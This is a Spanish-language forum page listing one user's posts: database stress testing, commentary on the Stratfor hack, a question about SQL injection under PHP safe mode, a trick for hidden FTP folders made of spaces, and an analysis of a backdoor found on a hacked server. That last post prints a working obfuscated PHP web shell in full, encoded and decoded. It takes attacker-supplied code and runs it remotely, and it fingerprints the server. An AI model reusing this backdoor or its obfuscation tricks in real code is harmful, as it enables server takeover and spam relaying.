Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Bud4

#1
Por ejemplo he visto problemas como overhead en las tablas con indices o tablas corruptas, necesito crear testear este tipo de situaciones porque obviamente no puedo estar esperando a que pase.

Aguien sabe como podria estresar una base de datos?
Estoy tratando de probar con MySql 5.1.x en entornos win o linux, creando un monton de consultas y upgrades por minuto pero todavia nada.

Se que llenando el disco duro facilmente puedo crear errores pero esa situacion ya la tengo estudiada o resuelta.

saludos
#2
Que opinan de estas noticias?

el 11 de dic An0nimus hakeo varias paginas, aparte del ataque global ddos por la ley de sopa y pipa... una de los haleos mas importates fue a str4tford, sql injection robo de bases de datos que incluian tarjetas de credito y passwords sin cifrar, anon1mus uso la info de las tarjetas de credito y transfirio sumas de dinero a ONGs (no confirmado)

pero str4tf0r es una especie de C.!.A privada (no gubernamental) y los clientes van desde inversionistas, a militares ya que es info sobre la estabilidad economica politica y proyecciones macroeconomicas, que incluyen informacion confidencial de guerras, corrupcion etc.

Ahora todo esto paso a manos the wiki y es una noticia caliente ya que ellos estan exponiendo la info a la prensa (y a cualquiera que tenga el tiempo de buscar entre un monton de info)

personalmente me gusta y apoyo que la informacion sea libre y este al alcance de todos...

"...un sistema que ha usado vastos recursos humanos y materiales para construir una maquina eficaz estrechamente tejida que combina operaciones militares, diplomáticas, de inteligencia, económicas, científicas y políticas.Sus preparativos son ocultos, no se publican. Sus errores son enterrados no salen en los periódicos. Sus disidentes son silenciados, no elogiados. No se cuestionan los gastos, no se publican los rumores, no se revelan los secretos..." -ultimo discurso de Keneddy

Este tipo de cosas hace la diferencia
#3
Foro Libre / Que opinan de este hackeo
27 Febrero 2012, 17:37 PM


On February 13, 2007 a New Mexico State Court found Sandia Corporation liable for $4.7 million in damages for the firing of a former network security analyst, Shawn Carpenter. Mr. Carpenter had reported to his supervisors that hundreds of military installations and defense contractors' networks were compromised and sensitive information was being stolen – including hundreds of sensitive Lockheed documents on the Mars Reconnaissance Orbiter project. When his supervisors told him to drop the investigation and do nothing with the information, he went to intelligence officials in the United States Army and later the Federal Bureau of Investigation to address the national security breaches. When Sandia managers discovered his actions months later, they revoked his security clearance and fired him.[2]

Esta empresa esta acargo de la ciencia y la tecnologia detras de las bombas atomicas y unos proyectos tetricos que dejan al haarp como un wifi casero xD, seria interesante ver esos documentos

Fuente: http://en.wikipedia.org/wiki/Sandia_National_Laboratories

#4
Que tipos de SQL injection se pueden hacer en un servidor con safe mode on?

He estado buscando, leyendo y probando, pero no encuentro nada.

#5
Bugs y Exploits / Vulnerabilidad en R4ckSp4c3
23 Febrero 2012, 20:39 PM
Solo una curiosidad que cl0ud fil3s o sites tienen esa vulnerabilidad de que se pueden crear carpetas por ftp solo con espacios

basicamente es el comando FTP "CWD ./ /" para crear las carpetas y "PWD ./ /" para entrar en ellas, generalemnte este tipo de carpeta quedan invisibles dentro del sistema y para la mayoria de clientes FTP (tambien se pueden acceder por web si el path lo permite solo poniendo espacios vacios o %20)

he ocupado la vulnerabilidad para darle mas seguridad a algunas aplicaciones.

Saludos!
#6
Hola:

Hace poco hackieron un server que administro, no estoy seguro como obtuvieron los password de un usuario ftp del sistema (probablemente un gusano en el pc del usuario), y bueno me puse a investigar no fue gran cosa aun asi me intereso por que el codigo es en php y encontre raro que eval pudiese ejecutar una funcion escrita con codigo unicode.

Código (php) [Seleccionar]

<?php //38200e90f44c94cb0073484daa4de93a 
 
$_
//ppZiAAS8dDJF9Q*(#_+@#TWyJ
'Ci8qKgogKiBAdmVyc2lvbiAyLjUKICogCiAqLwppZiAoaXNzZXQoJF9QT1NUWyJhY3Rpb24iXSkpCnsKICAgICAgICBzd2l0Y2ggKCRfUE9TVFsiYWN0aW9uIl0pCiAgICAgICAgewogICAgICAgICAgICAgICAgY2FzZSAidGVzdCI6CiAgICAgICAgICAgICAgICAgICAgICAgIHRlc3QoKTsKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICBjYXNlICJyZWd1bGFyX3Rlc3QiOgogICAgICAgICAgICAgICAgICAgICAgICByZWd1bGFyX3Rlc3QoKTsKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICBjYXNlICJtYWlsIjoKICAgICAgICAgICAgICAgICAgICAgICAgc2VuZCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGRlZmF1bHQ6CiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgIH0KICAgICAgICByZXR1cm47Cn0KCmlmIChjb3VudCgkX0dFVCkgPiAwKQp7CiAgICAgICAgZm9yZWFjaCAoJF9HRVQgYXMgJGlkID0+ICRjb2RlKQogICAgICAgIHsKICAgICAgICAgICAgICAgIGlmICgkaWQgPT0gImlkIikKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgJGNvZGUoKTsKICAgICAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgcmV0dXJuOwp9CgpmdW5jdGlvbiB0ZXN0KCkKewogICAgICAgICRlbmNvZGVkX2RhdGEgPSAiIjsKCiAgICAgICAgJGRhdGFbInZlcnNpb24iXSA9IHBocHZlcnNpb24oKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVJWRVJbIlNFUlZFUl9TT0ZUV0FSRSJdKSkKICAgICAgICB7CiAgICAgICAgICAgICAgICAkZGF0YVsic2VydmVyYXBpIl0gPSAkX1NFUlZFUlsiU0VSVkVSX1NPRlRXQVJFIl07CiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgICAgICAkZGF0YVsic2VydmVyYXBpIl0gPSAiTm90IEF2YWlsYWJsZSI7CiAgICAgICAgfQogICAgICAgIG9iX3N0YXJ0KCk7CiAgICAgICAgcGhwaW5mbyg4KTsKICAgICAgICAkZGF0YVsibW9kdWxlcyJdID0gb2JfZ2V0X2NvbnRlbnRzKCk7CiAgICAgICAgb2JfY2xlYW4oKTsKICAgICAgICAkZGF0YVsiZXh0X2Nvbm5lY3QiXSA9IGZvcGVuKCJodHRwOi8vd3d3LnlhLnJ1LyIsICJyIikgPyBUUlVFIDogRkFMU0U7CiAgICAgICAgJHNlcmlhbGl6ZXNfZGF0YSA9IHNlcmlhbGl6ZSgkZGF0YSk7CiAgICAgICAgJGVuY29kZWRfZGF0YSA9IGJhc2U2NF9lbmNvZGUoJHNlcmlhbGl6ZXNfZGF0YSk7CiAgICAgICAgZWNobyAkX1BPU1RbInRlc3RfbWVzc2FnZSJdIC4gJGVuY29kZWRfZGF0YTsKfQoKZnVuY3Rpb24gcmVndWxhcl90ZXN0KCkKewogICAgICAgIGVjaG8gJF9QT1NUWyJ0ZXN0X21lc3NhZ2UiXTsKfQoKZnVuY3Rpb24gc2VuZCgpCnsKICAgICAgICAkY29kZSA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJwcm9qZWN0Y29kZSJdKTsKICAgICAgCiAgICAgICAgZXZhbCgkY29kZSk7CiAgICAgICAgLy9yZXR1cm47Cn0K'
 
//ppZiAAS8dDJF9Q*(#_+@#TWyJ
$__ "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
?>



La primera sentencia del eval en estos casos deberia ser algun tipo ofuscacion compresion o hash, probe con base64_decode y al tercer paso pude ver el codigo

Código (php) [Seleccionar]

$code = base64_decode($_); eval($code);

/**
* @version 2.5
*
*/
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        $code();
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
     
        eval($code);
        //return;
}




en cuestion esto es lo que me llama la atencion que base64_decode esta expresado como unicode
"\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"

ademas de que en php se puede escribir como BaSe64_DecoDE o cualquier combiancion de mayusculas y minusculas tambien se pueden cambiar por ejemplo el \x62 por \162 (no se como interpreta php o cual es la diferencia entre x y 1)

tambien que se pueden intercalar caracteres normales por ejemplo "\x62"."a"."\x73"
y tambien como en el caso del numero 4 que viene despues de \6 que solo sirve en el caso de los numeros.

con esta pequenia ofuscacion en unicode se me ocurren varias cosas que se podrian hacer ya que no es intuitivo para muchos, les comparto lo que investigue y tambien me gustaria saber mas de unicode para testear otros tipos sql injection.

Saludos!

Nota: el hack fue solo un relay the spam con troyanos adjuntos en algunos casos.